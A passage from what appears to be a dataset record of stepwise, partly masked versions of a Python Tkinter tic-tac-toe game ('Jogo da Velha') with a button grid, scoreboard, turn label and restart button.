self.botão1x2.configure(command=self.botão1x2_clicado)\n self.botão2x0 = tk.Button(self.window)\n self.botão2x0.grid(row=3, column=0, sticky='nsew')\n self.botão2x0.configure(command=self.botão2x0_clicado)\n self.botão2x1 = tk.Button(self.window)\n self.botão2x1.grid(row=3, column=1, sticky='nsew')\n self.botão2x1.configure(command=self.botão2x1_clicado)\n self.botão2x2 = tk.Button(self.window)\n self.botão2x2.grid(row=3, column=2, sticky='nsew')\n self.botão2x2.configure(command=self.botão2x2_clicado)\n self.label_turno = tk.Label(self.window)\n self.label_turno.grid(row=4, column=0, columnspan=1, sticky='nsew')\n self.label_turno.configure(text='Turno de : {0}'.format(self.jogo.\n player), bg='Black', fg='Green', font='Arial 9')\n self.reiniciar = tk.Button(self.window)\n self.reiniciar.grid(row=4, column=1, columnspan=1, sticky='nsew')\n self.reiniciar.configure(text='Reiniciar', font='Arial 18',\n activeforeground='Green', fg='Red', command=self.restart)\n self.label_ganhador = tk.Label(self.window)\n self.label_ganhador.grid(row=4, column=2, columnspan=1, sticky='nsew')\n self.label_ganhador.configure(text='Ganhador: {0}'.format(self.jogo\n .ganhador), bg='Black', fg='Green', font='Arial 9')\n\n def clicou(self, i, j):\n print('Turno de: {0} '.format(self.jogo.player))\n print('Botão {0} x {1} clicado'.format(i, j))\n\n def botão0x0_clicado(self):\n self.clicou(0, 0)\n self.botão0x0.configure(text=self.jogo.player, state='disabled',\n font='Arial 100 ')\n self.jogo.recebe_jogada(0, 0)\n self.label_turno.configure(text='Turno de: {0}'.format(self.jogo.\n player))\n self.label_ganhador.configure(text='Ganhador: {0}'.format(self.jogo\n .ganhador), bg='Black', fg='Green', font='Arial 9')\n\n def botão0x1_clicado(self):\n self.clicou(0, 1)\n self.botão0x1.configure(text=self.jogo.player, state='disabled',\n font='Arial 100 ')\n self.jogo.recebe_jogada(0, 1)\n self.label_turno.configure(text='Turno de: {0}'.format(self.jogo.\n player))\n self.label_ganhador.configure(text='Ganhador: {0}'.format(self.jogo\n .ganhador), bg='Black', fg='Green', font='Arial 9')\n <mask token>\n\n def botão1x0_clicado(self):\n self.clicou(1, 0)\n self.botão1x0.configure(text=self.jogo.player, state='disabled',\n font='Arial 100 ')\n self.jogo.recebe_jogada(1, 0)\n self.label_turno.configure(text='Turno de: {0}'.format(self.jogo.\n player))\n self.label_ganhador.configure(text='Ganhador: {0}'.format(self.jogo\n .ganhador), bg='Black', fg='Green', font='Arial 9')\n\n def botão1x1_clicado(self):\n self.clicou(1, 1)\n self.botão1x1.configure(text=self.jogo.player, state='disabled',\n font='Arial 100 ')\n self.jogo.recebe_jogada(1, 1)\n self.label_turno.configure(text='Turno de: {0}'.format(self.jogo.\n player))\n self.label_ganhador.configure(text='Ganhador: {0}'.format(self.jogo\n .ganhador), bg='Black', fg='Green', font='Arial 9')\n <mask token>\n\n def botão2x0_clicado(self):\n self.clicou(2, 0)\n self.botão2x0.configure(text=self.jogo.player, state='disabled',\n font='Arial 100 ')\n self.jogo.recebe_jogada(2, 0)\n self.label_turno.configure(text='Turno de: {0}'.format(self.jogo.\n player))\n self.label_ganhador.configure(text='Ganhador: {0}'.format(self.jogo\n .ganhador), bg='Black', fg='Green', font='Arial 9')\n\n def botão2x1_clicado(self):\n self.clicou(2, 1)\n self.botão2x1.configure(text=self.jogo.player, state='disabled',\n font='Arial 100 ')\n self.jogo.recebe_jogada(2, 1)\n self.label_turno.configure(text='Turno de: {0}'.format(self.jogo.\n player))\n self.label_ganhador.configure(text='Ganhador: {0}'.format(self.jogo\n .ganhador), bg='Black', fg='Green', font='Arial 9')\n\n def botão2x2_clicado(self):\n self.clicou(2, 2)\n self.botão2x2.configure(text=self.jogo.player, state='disabled',\n font='Arial 100 ')\n self.jogo.recebe_jogada(2, 2)\n self.label_turno.configure(text='Turno de: {0}'.format(self.jogo.\n player))\n self.label_ganhador.configure(text='Ganhador: {0}'.format(self.jogo\n .ganhador), bg='Black', fg='Green', font='Arial 9')\n\n def iniciar(self):\n self.window.mainloop()\n\n def restart(self):\n self.jogo.limpa_jogadas()\n self.botão0x0 = tk.Button(self.window)\n self.botão0x0.grid(row=1, column=0, sticky='nsew')\n self.botão0x0.configure(command=self.botão0x0_clicado)\n self.botão0x1 = tk.Button(self.window)\n self.botão0x1.grid(row=1, column=1, sticky='nsew')\n self.botão0x1.configure(command=self.botão0x1_clicado)\n self.botão0x2 = tk.Button(self.window)\n self.botão0x2.grid(row=1, column=2, sticky='nsew')\n self.botão0x2.configure(command=self.botão0x2_clicado)\n self.botão1x0 = tk.Button(self.window)\n self.botão1x0.grid(row=2, column=0, sticky='nsew')\n self.botão1x0.configure(command=self.botão1x0_clicado)\n self.botão1x1 = tk.Button(self.window)\n self.botão1x1.grid(row=2, column=1, sticky='nsew')\n self.botão1x1.configure(command=self.botão1x1_clicado)\n self.botão1x2 = tk.Button(self.window)\n self.botão1x2.grid(row=2, column=2, sticky='nsew')\n self.botão1x2.configure(command=self.botão1x2_clicado)\n self.botão2x0 = tk.Button(self.window)\n self.botão2x0.grid(row=3, column=0, sticky='nsew')\n self.botão2x0.configure(command=self.botão2x0_clicado)\n self.botão2x1 = tk.Button(self.window)\n self.botão2x1.grid(row=3, column=1, sticky='nsew')\n self.botão2x1.configure(command=self.botão2x1_clicado)\n self.botão2x2 = tk.Button(self.window)\n self.botão2x2.grid(row=3, column=2, sticky='nsew')\n self.botão2x2.configure(command=self.botão2x2_clicado)\n self.label_turno = tk.Label(self.window)\n self.label_turno.grid(row=4, column=0, columnspan=1, sticky='nsew')\n self.label_turno.configure(text='Turno de : {0}'.format(self.jogo.\n player), bg='Black', fg='Green', font='Arial 9')\n self.reiniciar = tk.Button(self.window)\n self.reiniciar.grid(row=4, column=1, columnspan=1, sticky='nsew')\n self.reiniciar.configure(text='Reiniciar', font='Arial 24',\n activeforeground='Green', fg='Red', command=self.restart)\n self.label_ganhador = tk.Label(self.window)\n self.label_ganhador.grid(row=4, column=2, columnspan=1, sticky='nsew')\n self.label_ganhador.configure(text='Ganhador: {0}'.format(self.jogo\n .ganhador), bg='Black', fg='Green', font='Arial 9')\n self.vitorias_X.configure(text='Vitórias de X: {0} '.format(self.\n jogo.vitórias_x), bg='Blue', fg='White')\n self.vitorias_O.configure(text='Vitórias de O: {0} '.format(self.\n jogo.vitórias_o), bg='Yellow', fg='Black')\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass Tabuleiro:\n\n def __init__(self):\n self.jogo = classejogo.Jogo()\n self.window = tk.Tk()\n self.window.title('Jogo da Velha')\n self.window.geometry('300x360+100+100')\n self.window.rowconfigure(0, minsize=30, weight=1)\n self.window.rowconfigure(1, minsize=100, weight=1)\n self.window.rowconfigure(2, minsize=100, weight=1)\n self.window.rowconfigure(3, minsize=100, weight=1)\n self.window.rowconfigure(4, minsize=30, weight=1)\n self.window.columnconfigure(0, minsize=100, weight=1)\n self.window.columnconfigure(1, minsize=100, weight=1)\n self.window.columnconfigure(2, minsize=100, weight=1)\n self.window.columnconfigure(3, minsize=100, weight=1)\n self.vitorias_X = tk.Label(self.window)\n self.vitorias_X.grid(row=0, column=0, sticky='nsew')\n self.vitorias_X.configure(text='Vitórias de X: {0} '.format(self.\n jogo.vitórias_x), font='Arial 10', bg='Blue', fg='White')\n self.placar = tk.Label(self.window)\n self.placar.grid(row=0, column=1, sticky='nsew')\n self.placar.configure(text='<- PLACAR ->', font='Arial 10', bg=\n 'Black', fg='Green')\n self.vitorias_O = tk.Label(self.window)\n self.vitorias_O.grid(row=0, column=2, sticky='nsew')\n self.vitorias_O.configure(text='Vitórias de O: {0} '.format(self.\n jogo.vitórias_o), font='Arial 10', bg='Yellow', fg='Black')\n self.botão0x0 = tk.Button(self.window)\n self.botão0x0.grid(row=1, column=0, sticky='nsew')\n self.botão0x0.configure(command=self.botão0x0_clicado)\n self.botão0x1 = tk.Button(self.window)\n self.botão0x1.grid(row=1, column=1, sticky='nsew')\n self.botão0x1.configure(command=self.botão0x1_clicado)\n self.botão0x2 = tk.Button(self.window)\n self.botão0x2.grid(row=1, column=2, sticky='nsew')\n self.botão0x2.configure(command=self.botão0x2_clicado)\n self.botão1x0 = tk.Button(self.window)\n self.botão1x0.grid(row=2, column=0, sticky='nsew')\n self.botão1x0.configure(command=self.botão1x0_clicado)\n self.botão1x1 = tk.Button(self.window)\n self.botão1x1.grid(row=2, column=1, sticky='nsew')\n self.botão1x1.configure(command=self.botão1x1_clicado)\n self.botão1x2 = tk.Button(self.window)\n self.botão1x2.grid(row=2, column=2, sticky='nsew')\n self.botão1x2.configure(command=self.botão1x2_clicado)\n self.botão2x0 = tk.Button(self.window)\n self.botão2x0.grid(row=3, column=0, sticky='nsew')\n self.botão2x0.configure(command=self.botão2x0_clicado)\n self.botão2x1 = tk.Button(self.window)\n self.botão2x1.grid(row=3, column=1, sticky='nsew')\n self.botão2x1.configure(command=self.botão2x1_clicado)\n self.botão2x2 = tk.Button(self.window)\n self.botão2x2.grid(row=3, column=2, sticky='nsew')\n self.botão2x2.configure(command=self.botão2x2_clicado)\n self.label_turno = tk.Label(self.window)\n self.label_turno.grid(row=4, column=0, columnspan=1, sticky='nsew')\n self.label_turno.configure(text='Turno de : {0}'.format(self.jogo.\n player), bg='Black', fg='Green', font='Arial 9')\n self.reiniciar = tk.Button(self.window)\n self.reiniciar.grid(row=4, column=1, columnspan=1, sticky='nsew')\n self.reiniciar.configure(text='Reiniciar', font='Arial 18',\n activeforeground='Green', fg='Red', command=self.restart)\n self.label_ganhador = tk.Label(self.window)\n self.label_ganhador.grid(row=4, column=2, columnspan=1, sticky='nsew')\n self.label_ganhador.configure(text='Ganhador: {0}'.format(self.jogo\n .ganhador), bg='Black', fg='Green', font='Arial 9')\n\n def clicou(self, i, j):\n print('Turno de: {0} '.format(self.jogo.player))\n print('Botão {0} x {1} clicado'.format(i, j))\n\n def botão0x0_clicado(self):\n self.clicou(0, 0)\n self.botão0x0.configure(text=self.jogo.player, state='disabled',\n font='Arial 100 ')\n self.jogo.recebe_jogada(0, 0)\n self.label_turno.configure(text='Turno de: {0}'.format(self.jogo.\n player))\n self.label_ganhador.configure(text='Ganhador: {0}'.format(self.jogo\n .ganhador), bg='Black', fg='Green', font='Arial 9')\n\n def botão0x1_clicado(self):\n self.clicou(0, 1)\n self.botão0x1.configure(text=self.jogo.player, state='disabled',\n font='Arial 100 ')\n self.jogo.recebe_jogada(0, 1)\n self.label_turno.configure(text='Turno de: {0}'.format(self.jogo.\n player))\n self.label_ganhador.configure(text='Ganhador: {0}'.format(self.jogo\n .ganhador), bg='Black', fg='Green', font='Arial 9')\n\n def botão0x2_clicado(self):\n self.clicou(0, 2)\n self.botão0x2.configure(text=self.jogo.player, state='disabled',\n font='Arial 100 ')\n self.jogo.recebe_jogada(0, 2)\n self.label_turno.configure(text='Turno de: {0}'.format(self.jogo.\n player))\n self.label_ganhador.configure(text='Ganhador: {0}'.format(self.jogo\n .ganhador), bg='Black', fg='Green', font='Arial 9')\n\n def botão1x0_clicado(self):\n self.clicou(1, 0)\n self.botão1x0.configure(text=self.jogo.player, state='disabled',\n font='Arial 100 ')\n self.jogo.recebe_jogada(1, 0)\n self.label_turno.configure(text='Turno de: {0}'.format(self.jogo.\n player))\n self.label_ganhador.configure(text='Ganhador: {0}'.format(self.jogo\n .ganhador), bg='Black', fg='Green', font='Arial 9')\n\n def botão1x1_clicado(self):\n self.clicou(1, 1)\n self.botão1x1.configure(text=self.jogo.player, state='disabled',\n font='Arial 100 ')\n self.jogo.recebe_jogada(1, 1)\n self.label_turno.configure(text='Turno de: {0}'.format(self.jogo.\n player))\n self.label_ganhador.configure(text='Ganhador: {0}'.format(self.jogo\n .ganhador), bg='Black', fg='Green', font='Arial 9')\n\n def botão1x2_clicado(self):\n self.clicou(1, 2)\n self.botão1x2.configure(text=self.jogo.player, state='disabled',\n font='Arial 100 ')\n self.jogo.recebe_jogada(1, 2)\n self.label_turno.configure(text='Turno de: {0}'.format(self.jogo.\n player))\n self.label_ganhador.configure(text='Ganhador: {0}'.format(self.jogo\n .ganhador), bg='Black', fg='Green', font='Arial 9')\n\n def botão2x0_clicado(self):\n self.clicou(2, 0)\n self.botão2x0.configure(text=self.jogo.player, state='disabled',\n font='Arial 100 ')\n self.jogo.recebe_jogada(2, 0)\n self.label_turno.configure(text='Turno de: {0}'.format(self.jogo.\n player))\n self.label_ganhador.configure(text='Ganhador: {0}'.format(self.jogo\n .ganhador), bg='Black', fg='Green', font='Arial 9')\n\n def botão2x1_clicado(self):\n self.clicou(2, 1)\n self.botão2x1.configure(text=self.jogo.player, state='disabled',\n font='Arial 100 ')\n self.jogo.recebe_jogada(2, 1)\n self.label_turno.configure(text='Turno de: {0}'.format(self.jogo.\n player))\n self.label_ganhador.configure(text='Ganhador: {0}'.format(self.jogo\n .ganhador), bg='Black', fg='Green', font='Arial 9')\n\n def botão2x2_clicado(self):\n self.clicou(2, 2)\n self.botão2x2.configure(text=self.jogo.player, state='disabled',\n font='Arial 100 ')\n self.jogo.recebe_jogada(2, 2)\n self.label_turno.configure(text='Turno de: {0}'.format(self.jogo.\n player))\n self.label_ganhador.configure(text='Ganhador: {0}'.format(self.jogo\n .ganhador), bg='Black', fg='Green', font='Arial 9')\n\n def iniciar(self):\n self.window.mainloop()\n\n def restart(self):\n self.jogo.limpa_jogadas()\n self.botão0x0 = tk.Button(self.window)\n self.botão0x0.grid(row=1, column=0, sticky='nsew')\n self.botão0x0.configure(command=self.botão0x0_clicado)\n self.botão0x1 = tk.Button(self.window)\n self.botão0x1.grid(row=1, column=1, sticky='nsew')\n self.botão0x1.configure(command=self.botão0x1_clicado)\n self.botão0x2 = tk.Button(self.window)\n self.botão0x2.grid(row=1, column=2, sticky='nsew')\n self.botão0x2.configure(command=self.botão0x2_clicado)\n self.botão1x0 = tk.Button(self.window)\n self.botão1x0.grid(row=2, column=0, sticky='nsew')\n self.botão1x0.configure(command=self.botão1x0_clicado)\n self.botão1x1 = tk.Button(self.window)\n self.botão1x1.grid(row=2, column=1, sticky='nsew')\n self.botão1x1.configure(command=self.botão1x1_clicado)\n self.botão1x2 = tk.Button(self.window)\n self.botão1x2.grid(row=2, column=2, sticky='nsew')\n self.botão1x2.configure(command=self.botão1x2_clicado)\n self.botão2x0 = tk.Button(self.window)\n self.botão2x0.grid(row=3, column=0, sticky='nsew')\n self.botão2x0.configure(command=self.botão2x0_clicado)\n self.botão2x1 = tk.Button(self.window)\n self.botão2x1.grid(row=3, column=1, sticky='nsew')\n self.botão2x1.configure(command=self.botão2x1_clicado)\n self.botão2x2 = tk.Button(self.window)\n self.botão2x2.grid(row=3, column=2, sticky='nsew')\n self.botão2x2.configure(command=self.botão2x2_clicado)\n self.label_turno = tk.Label(self.window)\n self.label_turno.grid(row=4, column=0, columnspan=1, sticky='nsew')\n self.label_turno.configure(text='Turno de : {0}'.format(self.jogo.\n player), bg='Black', fg='Green', font='Arial 9')\n self.reiniciar = tk.Button(self.window)\n self.reiniciar.grid(row=4, column=1, columnspan=1, sticky='nsew')\n self.reiniciar.configure(text='Reiniciar', font='Arial 24',\n activeforeground='Green', fg='Red', command=self.restart)\n self.label_ganhador = tk.Label(self.window)\n self.label_ganhador.grid(row=4, column=2, columnspan=1, sticky='nsew')\n self.label_ganhador.configure(text='Ganhador: {0}'.format(self.jogo\n .ganhador), bg='Black', fg='Green', font='Arial 9')\n self.vitorias_X.configure(text='Vitórias de X: {0} '.format(self.\n jogo.vitórias_x), bg='Blue', fg='White')\n self.vitorias_O.configure(text='Vitórias de O: {0} '.format(self.\n jogo.vitórias_o), bg='Yellow', fg='Black')\n\n\n<mask token>\njogodavelha.iniciar()\n",
"step-4": "<mask token>\n\n\nclass Tabuleiro:\n\n def __init__(self):\n self.jogo = classejogo.Jogo()\n self.window = tk.Tk()\n self.window.title('Jogo da Velha')\n self.window.geometry('300x360+100+100')\n self.window.rowconfigure(0, minsize=30, weight=1)\n self.window.rowconfigure(1, minsize=100, weight=1)\n self.window.rowconfigure(2, minsize=100, weight=1)\n self.window.rowconfigure(3, minsize=100, weight=1)\n self.window.rowconfigure(4, minsize=30, weight=1)\n self.window.columnconfigure(0, minsize=100, weight=1)\n self.window.columnconfigure(1, minsize=100, weight=1)\n self.window.columnconfigure(2, minsize=100, weight=1)\n self.window.columnconfigure(3, minsize=100, weight=1)\n self.vitorias_X = tk.Label(self.window)\n self.vitorias_X.grid(row=0, column=0, sticky='nsew')\n self.vitorias_X.configure(text='Vitórias de X: {0} '.format(self.\n jogo.vitórias_x), font='Arial 10', bg='Blue', fg='White')\n self.placar = tk.Label(self.window)\n self.placar.grid(row=0, column=1, sticky='nsew')\n self.placar.configure(text='<- PLACAR ->', font='Arial 10', bg=\n 'Black', fg='Green')\n self.vitorias_O = tk.Label(self.window)\n self.vitorias_O.grid(row=0, column=2, sticky='nsew')\n self.vitorias_O.configure(text='Vitórias de O: {0} '.format(self.\n jogo.vitórias_o), font='Arial 10', bg='Yellow', fg='Black')\n self.botão0x0 = tk.Button(self.window)\n self.botão0x0.grid(row=1, column=0, sticky='nsew')\n self.botão0x0.configure(command=self.botão0x0_clicado)\n self.botão0x1 = tk.Button(self.window)\n self.botão0x1.grid(row=1, column=1, sticky='nsew')\n self.botão0x1.configure(command=self.botão0x1_clicado)\n self.botão0x2 = tk.Button(self.window)\n self.botão0x2.grid(row=1, column=2, sticky='nsew')\n self.botão0x2.configure(command=self.botão0x2_clicado)\n self.botão1x0 = tk.Button(self.window)\n self.botão1x0.grid(row=2, column=0, sticky='nsew')\n self.botão1x0.configure(command=self.botão1x0_clicado)\n self.botão1x1 = tk.Button(self.window)\n self.botão1x1.grid(row=2, column=1, sticky='nsew')\n self.botão1x1.configure(command=self.botão1x1_clicado)\n self.botão1x2 = tk.Button(self.window)\n self.botão1x2.grid(row=2, column=2, sticky='nsew')\n self.botão1x2.configure(command=self.botão1x2_clicado)\n self.botão2x0 = tk.Button(self.window)\n self.botão2x0.grid(row=3, column=0, sticky='nsew')\n self.botão2x0.configure(command=self.botão2x0_clicado)\n self.botão2x1 = tk.Button(self.window)\n self.botão2x1.grid(row=3, column=1, sticky='nsew')\n self.botão2x1.configure(command=self.botão2x1_clicado)\n self.botão2x2 = tk.Button(self.window)\n self.botão2x2.grid(row=3, column=2, sticky='nsew')\n self.botão2x2.configure(command=self.botão2x2_clicado)\n self.label_turno = tk.Label(self.window)\n self.label_turno.grid(row=4, column=0, columnspan=1, sticky='nsew')\n self.label_turno.configure(text='Turno de : {0}'.format(self.jogo.\n player), bg='Black', fg='Green', font='Arial 9')\n self.reiniciar = tk.Button(self.window)\n self.reiniciar.grid(row=4, column=1, columnspan=1, sticky='nsew')\n self.reiniciar.configure(text='Reiniciar', font='Arial 18',\n activeforeground='Green', fg='Red', command=self.restart)\n self.label_ganhador = tk.Label(self.window)\n self.label_ganhador.grid(row=4, column=2, columnspan=1, sticky='nsew')\n self.label_ganhador.configure(text='Ganhador: {0}'.format(self.jogo\n .ganhador), bg='Black', fg='Green', font='Arial 9')\n\n def clicou(self, i, j):\n print('Turno de: {0} '.format(self.jogo.player))\n print('Botão {0} x {1} clicado'.format(i, j))\n\n def botão0x0_clicado(self):\n self.clicou(0, 0)\n self.botão0x0.configure(text=self.jogo.player, state='disabled',\n font='Arial 100 ')\n self.jogo.recebe_jogada(0, 0)\n self.label_turno.configure(text='Turno de: {0}'.format(self.jogo.\n player))\n self.label_ganhador.configure(text='Ganhador: {0}'.format(self.jogo\n .ganhador), bg='Black', fg='Green', font='Arial 9')\n\n def botão0x1_clicado(self):\n self.clicou(0, 1)\n self.botão0x1.configure(text=self.jogo.player, state='disabled',\n font='Arial 100 ')\n self.jogo.recebe_jogada(0, 1)\n self.label_turno.configure(text='Turno de: {0}'.format(self.jogo.\n player))\n self.label_ganhador.configure(text='Ganhador: {0}'.format(self.jogo\n .ganhador), bg='Black', fg='Green', font='Arial 9')\n\n def botão0x2_clicado(self):\n self.clicou(0, 2)\n self.botão0x2.configure(text=self.jogo.player, state='disabled',\n font='Arial 100 ')\n self.jogo.recebe_jogada(0, 2)\n self.label_turno.configure(text='Turno de: {0}'.format(self.jogo.\n player))\n self.label_ganhador.configure(text='Ganhador: {0}'.format(self.jogo\n .ganhador), bg='Black', fg='Green', font='Arial 9')\n\n def botão1x0_clicado(self):\n self.clicou(1, 0)\n self.botão1x0.configure(text=self.jogo.player, state='disabled',\n font='Arial 100 ')\n self.jogo.recebe_jogada(1, 0)\n self.label_turno.configure(text='Turno de: {0}'.format(self.jogo.\n player))\n self.label_ganhador.configure(text='Ganhador: {0}'.format(self.jogo\n .ganhador), bg='Black', fg='Green', font='Arial 9')\n\n def botão1x1_clicado(self):\n self.clicou(1, 1)\n self.botão1x1.configure(text=self.jogo.player, state='disabled',\n font='Arial 100 ')\n self.jogo.recebe_jogada(1, 1)\n self.label_turno.configure(text='Turno de: {0}'.format(self.jogo.\n player))\n self.label_ganhador.configure(text='Ganhador: {0}'.format(self.jogo\n .ganhador), bg='Black', fg='Green', font='Arial 9')\n\n def botão1x2_clicado(self):\n self.clicou(1, 2)\n self.botão1x2.configure(text=self.jogo.player, state='disabled',\n font='Arial 100 ')\n self.jogo.recebe_jogada(1, 2)\n self.label_turno.configure(text='Turno de: {0}'.format(self.jogo.\n player))\n self.label_ganhador.configure(text='Ganhador: {0}'.format(self.jogo\n .ganhador), bg='Black', fg='Green', font='Arial 9')\n\n def botão2x0_clicado(self):\n self.clicou(2, 0)\n self.botão2x0.configure(text=self.jogo.player, state='disabled',\n font='Arial 100 ')\n self.jogo.recebe_jogada(2, 0)\n self.label_turno.configure(text='Turno de: {0}'.format(self.jogo.\n player))\n self.label_ganhador.configure(text='Ganhador: {0}'.format(self.jogo\n .ganhador), bg='Black', fg='Green', font='Arial 9')\n\n def botão2x1_clicado(self):\n self.clicou(2, 1)\n self.botão2x1.configure(text=self.jogo.player, state='disabled',\n font='Arial 100 ')\n self.jogo.recebe_jogada(2, 1)\n self.label_turno.configure(text='Turno de: {0}'.format(self.jogo.\n player))\n self.label_ganhador.configure(text='Ganhador: {0}'.format(self.jogo\n .ganhador), bg='Black', fg='Green', font='Arial 9')\n\n def botão2x2_clicado(self):\n self.clicou(2, 2)\n self.botão2x2.configure(text=self.jogo.player, state='disabled',\n font='Arial 100 ')\n self.jogo.recebe_jogada(2, 2)\n self.label_turno.configure(text='Turno de: {0}'.format(self.jogo.\n player))\n self.label_ganhador.configure(text='Ganhador: {0}'.format(self.jogo\n .ganhador), bg='Black', fg='Green', font='Arial 9')\n\n def iniciar(self):\n self.window.mainloop()\n\n def restart(self):\n self.jogo.limpa_jogadas()\n self.botão0x0 = tk.Button(self.window)\n self.botão0x0.grid(row=1, column=0, sticky='nsew')\n self.botão0x0.configure(command=self.botão0x0_clicado)\n self.botão0x1 = tk.Button(self.window)\n self.botão0x1.grid(row=1, column=1, sticky='nsew')\n self.botão0x1.configure(command=self.botão0x1_clicado)\n self.botão0x2 = tk.Button(self.window)\n self.botão0x2.grid(row=1, column=2, sticky='nsew')\n self.botão0x2.configure(command=self.botão0x2_clicado)\n self.botão1x0 = tk.Button(self.window)\n self.botão1x0.grid(row=2, column=0, sticky='nsew')\n self.botão1x0.configure(command=self.botão1x0_clicado)\n self.botão1x1 = tk.Button(self.window)\n self.botão1x1.grid(row=2, column=1, sticky='nsew')\n self.botão1x1.configure(command=self.botão1x1_clicado)\n self.botão1x2 = tk.Button(self.window)\n self.botão1x2.grid(row=2, column=2, sticky='nsew')\n self.botão1x2.configure(command=self.botão1x2_clicado)\n self.botão2x0 = tk.Button(self.window)\n self.botão2x0.grid(row=3, column=0, sticky='nsew')\n self.botão2x0.configure(command=self.botão2x0_clicado)\n self.botão2x1 = tk.Button(self.window)\n self.botão2x1.grid(row=3, column=1, sticky='nsew')\n self.botão2x1.configure(command=self.botão2x1_clicado)\n self.botão2x2 = tk.Button(self.window)\n self.botão2x2.grid(row=3, column=2, sticky='nsew')\n self.botão2x2.configure(command=self.botão2x2_clicado)\n self.label_turno = tk.Label(self.window)\n self.label_turno.grid(row=4, column=0, columnspan=1, sticky='nsew')\n self.label_turno.configure(text='Turno de : {0}'.format(self.jogo.\n player), bg='Black', fg='Green', font='Arial 9')\n self.reiniciar = tk.Button(self.window)\n self.reiniciar.grid(row=4, column=1, columnspan=1, sticky='nsew')\n self.reiniciar.configure(text='Reiniciar', font='Arial 24',\n activeforeground='Green', fg='Red', command=self.restart)\n self.label_ganhador = tk.Label(self.window)\n self.label_ganhador.grid(row=4, column=2, columnspan=1, sticky='nsew')\n self.label_ganhador.configure(text='Ganhador: {0}'.format(self.jogo\n .ganhador), bg='Black', fg='Green', font='Arial 9')\n self.vitorias_X.configure(text='Vitórias de X: {0} '.format(self.\n jogo.vitórias_x), bg='Blue', fg='White')\n self.vitorias_O.configure(text='Vitórias de O: {0} '.format(self.\n jogo.vitórias_o), bg='Yellow', fg='Black')\n\n\njogodavelha = Tabuleiro()\njogodavelha.iniciar()\n",
"step-5": "import tkinter as tk\nimport classejogo\n\n\nclass Tabuleiro():\n def __init__(self):\n self.jogo = classejogo.Jogo()\n self.window = tk.Tk()\n self.window.title(\"Jogo da Velha\")\n self.window.geometry(\"300x360+100+100\")\n self.window.rowconfigure(0, minsize=30, weight=1)\n self.window.rowconfigure(1, minsize=100, weight=1)\n self.window.rowconfigure(2, minsize=100, weight=1)\n self.window.rowconfigure(3, minsize=100, weight=1)\n self.window.rowconfigure(4, minsize=30, weight=1)\n self.window.columnconfigure(0, minsize=100, weight=1)\n self.window.columnconfigure(1, minsize=100, weight=1)\n self.window.columnconfigure(2, minsize=100, weight=1)\n self.window.columnconfigure(3, minsize=100, weight=1)\n \n #Criando os Botões:\n self.vitorias_X = tk.Label(self.window)\n self.vitorias_X.grid(row=0, column=0, sticky=\"nsew\")\n self.vitorias_X.configure(text=\"Vitórias de X: {0} \".format(self.jogo.vitórias_x),font='Arial 10', bg='Blue', fg='White')\n \n self.placar = tk.Label(self.window)\n self.placar.grid(row=0, column=1, sticky=\"nsew\")\n self.placar.configure(text= \"<- PLACAR ->\",font='Arial 10', bg='Black', fg='Green')\n\n self.vitorias_O = tk.Label(self.window)\n self.vitorias_O.grid(row=0, column=2, sticky=\"nsew\")\n self.vitorias_O.configure(text=\"Vitórias de O: {0} \".format(self.jogo.vitórias_o), font='Arial 10', bg='Yellow', fg='Black')\n \n \n self.botão0x0 = tk.Button(self.window)\n self.botão0x0.grid(row=1, column=0, sticky=\"nsew\")\n self.botão0x0.configure(command=self.botão0x0_clicado)\n \n self.botão0x1 = tk.Button(self.window)\n self.botão0x1.grid(row=1, column=1, sticky=\"nsew\")\n self.botão0x1.configure(command=self.botão0x1_clicado)\n \n self.botão0x2 = tk.Button(self.window)\n self.botão0x2.grid(row=1, column=2, sticky=\"nsew\")\n self.botão0x2.configure(command=self.botão0x2_clicado)\n \n self.botão1x0 = tk.Button(self.window)\n self.botão1x0.grid(row=2, column=0, sticky=\"nsew\")\n self.botão1x0.configure(command=self.botão1x0_clicado)\n \n self.botão1x1 = tk.Button(self.window)\n self.botão1x1.grid(row=2, column=1, sticky=\"nsew\")\n self.botão1x1.configure(command=self.botão1x1_clicado)\n \n self.botão1x2 = tk.Button(self.window)\n self.botão1x2.grid(row=2, column=2, sticky=\"nsew\")\n self.botão1x2.configure(command=self.botão1x2_clicado)\n \n self.botão2x0 = tk.Button(self.window)\n self.botão2x0.grid(row=3, column=0, sticky=\"nsew\")\n self.botão2x0.configure(command=self.botão2x0_clicado)\n \n self.botão2x1 = tk.Button(self.window)\n self.botão2x1.grid(row=3, column=1, sticky=\"nsew\")\n self.botão2x1.configure(command=self.botão2x1_clicado)\n \n self.botão2x2 = tk.Button(self.window)\n self.botão2x2.grid(row=3, column=2, sticky=\"nsew\")\n self.botão2x2.configure(command=self.botão2x2_clicado)\n \n #Criando a Label dos turnos: \n self.label_turno = tk.Label(self.window)\n self.label_turno.grid(row=4, column=0, columnspan=1, sticky=\"nsew\")\n self.label_turno.configure(text=\"Turno de : {0}\" .format(self.jogo.player), bg='Black', fg='Green',font='Arial 9',)\n \n #Criando Botão de Reiniciar:\n self.reiniciar = tk.Button(self.window)\n self.reiniciar.grid(row=4, column=1,columnspan=1, sticky=\"nsew\")\n self.reiniciar.configure(text=\"Reiniciar\", font='Arial 18', activeforeground='Green', fg='Red', command=self.restart)\n \n self.label_ganhador = tk.Label(self.window)\n self.label_ganhador.grid(row=4, column=2, columnspan=1, sticky=\"nsew\")\n self.label_ganhador.configure(text=\"Ganhador: {0}\" .format(self.jogo.ganhador), bg='Black', fg='Green',font='Arial 9',)\n############################################################################### \n def clicou(self, i, j):\n print(\"Turno de: {0} \" .format(self.jogo.player))\n print(\"Botão {0} x {1} clicado\" .format(i,j))\n###############################################################################\n def botão0x0_clicado(self):\n self.clicou(0,0)\n self.botão0x0.configure(text=self.jogo.player, state= \"disabled\", font='Arial 100 ')\n self.jogo.recebe_jogada(0,0)\n self.label_turno.configure(text=\"Turno de: {0}\" .format(self.jogo.player))\n self.label_ganhador.configure(text=\"Ganhador: {0}\" .format(self.jogo.ganhador), bg='Black', fg='Green',font='Arial 9',)\n def botão0x1_clicado(self):\n self.clicou(0,1)\n self.botão0x1.configure(text=self.jogo.player, state= \"disabled\", font='Arial 100 ')\n self.jogo.recebe_jogada(0,1)\n self.label_turno.configure(text=\"Turno de: {0}\" .format(self.jogo.player)) \n self.label_ganhador.configure(text=\"Ganhador: {0}\" .format(self.jogo.ganhador), bg='Black', fg='Green',font='Arial 9',)\n def botão0x2_clicado(self):\n self.clicou(0,2)\n self.botão0x2.configure(text=self.jogo.player, state= \"disabled\", font='Arial 100 ')\n 